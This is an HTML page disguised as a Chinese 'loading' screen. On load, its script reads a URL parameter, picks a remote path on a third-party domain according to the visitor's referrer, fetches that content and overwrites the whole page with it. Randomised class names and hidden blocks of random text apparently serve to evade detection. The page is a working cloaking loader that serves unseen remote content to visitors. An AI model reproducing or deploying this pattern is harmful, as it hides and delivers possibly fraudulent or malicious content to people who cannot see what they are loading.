<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .FZXSB9F2y {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .FZXSB9F2y .cOITtHq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .FZXSB9F2y .content {
            line-height: 50px;
            text-align: center
        }

        .FZXSB9F2y .img {
            width: 100%
        }

        .FZXSB9F2y .sk7RlbdBNt {
            text-align: center
        }

        .FZXSB9F2y .sk7RlbdBNt span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .FZXSB9F2y .sk7RlbdBNt span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .FZXSB9F2y .sk7RlbdBNt span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .FZXSB9F2y .sk7RlbdBNt span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .FZXSB9F2y .sk7RlbdBNt span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .FZXSB9F2y .sk7RlbdBNt span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .FZXSB9F2y .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CgZAahRlj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wrzROAd = CgZAahRlj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wrzROAd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wrzROAd +".html?a=share";
		}
		
        TtsjusW=url+"#"+new Date().getTime();
        TtsjusW && function() {
            $.get(TtsjusW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >ZiXL9dPqCIUwLLBSxBQj8AK5K6xvfz8K2Q8VuL86BUsRZJr4X</h1>
<ul style='display:none' >i2IxByvB3rDZT</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<b style='display:none' >NCTSbiwjj33lHm5sRLJvk04LFykYqe2NTpqfrTLn9XHk2u3CA1xcrIv4Uuv5Ne9FvxRhLILQCE6r24b5dahU</b>
<h1 style='display:none' >ZiXL9dPqCIUwLLBSxBQj8AK5K6xvfz8K2Q8VuL86BUsRZJr4X</h1>
<div style='display:none'>jCHImW0fxGRfqnrY8ACmUIlf31pPOEd9maD0x8KGtgYyj9ceaZo5IaUueKfs6EQqAzqPQVm90TLQpXitHNC58R4RKWq</div>
<b style='display:none' >NCTSbiwjj33lHm5sRLJvk04LFykYqe2NTpqfrTLn9XHk2u3CA1xcrIv4Uuv5Ne9FvxRhLILQCE6r24b5dahU</b><div class="FZXSB9F2y">
    <div class="cOITtHq">
        <div class="sk7RlbdBNt">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>ONNysfsHiqJ66qcncjN</span>
<div style='display:none'>sX3qtzSKFtMJF2QM5GtPJXYl</div>
<h1 style='display:none' >fgGJp8xT9d6Bg9kQLnoZ5YX6EjDftBpXt</h1></body>
</html>